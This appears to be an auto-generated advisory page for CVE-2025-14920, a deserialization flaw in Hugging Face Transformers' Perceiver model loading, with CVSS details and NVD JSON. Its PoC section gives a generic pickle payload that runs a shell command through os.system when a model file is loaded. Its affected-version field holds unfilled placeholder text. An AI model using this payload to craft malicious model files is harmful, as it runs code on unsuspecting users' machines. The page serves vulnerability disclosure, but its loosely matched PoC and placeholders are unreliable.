CVE-2025-14920

Description

Hugging Face Transformers Perceiver Model Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of model files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-25423.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:huggingface:transformers:4.54.1:*:*:*:*:*:*:* - VULNERABLE

Hugging Face Transformers Perceiver Model < 修复版本

具体版本需参考官方安全公告

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import pickle
import os

# 恶意代码执行演示
class MaliciousPayload:
    def __reduce__(self):
        # 反弹shell或执行任意命令
        cmd = "whoami > /tmp/pwned.txt"
        return (os.system, (cmd,))

# 生成恶意模型文件
malicious_data = pickle.dumps(MaliciousPayload())

# 保存为模型文件格式（实际攻击中需适配目标格式）
with open('malicious_model.bin', 'wb') as f:
    f.write(malicious_data)

print("Malicious model file created: malicious_model.bin")
print("When loaded by transformers, will execute: whoami > /tmp/pwned.txt")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14920
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14920
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14920/
[4] VulDB https://vuldb.com/cve/CVE-2025-14920
[5] https://www.zerodayinitiative.com/advisories/ZDI-25-1150/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14920", "sourceIdentifier": "[email protected]", "published": "2025-12-23T21:15:47.183", "lastModified": "2026-01-21T16:45:40.850", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hugging Face Transformers Perceiver Model Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of model files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-25423."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:huggingface:transformers:4.54.1:*:*:*:*:*:*:*", "matchCriteriaId": "A0D191EE-0D6C-4D5D-A1B7-C19000D57F1C"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1150/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}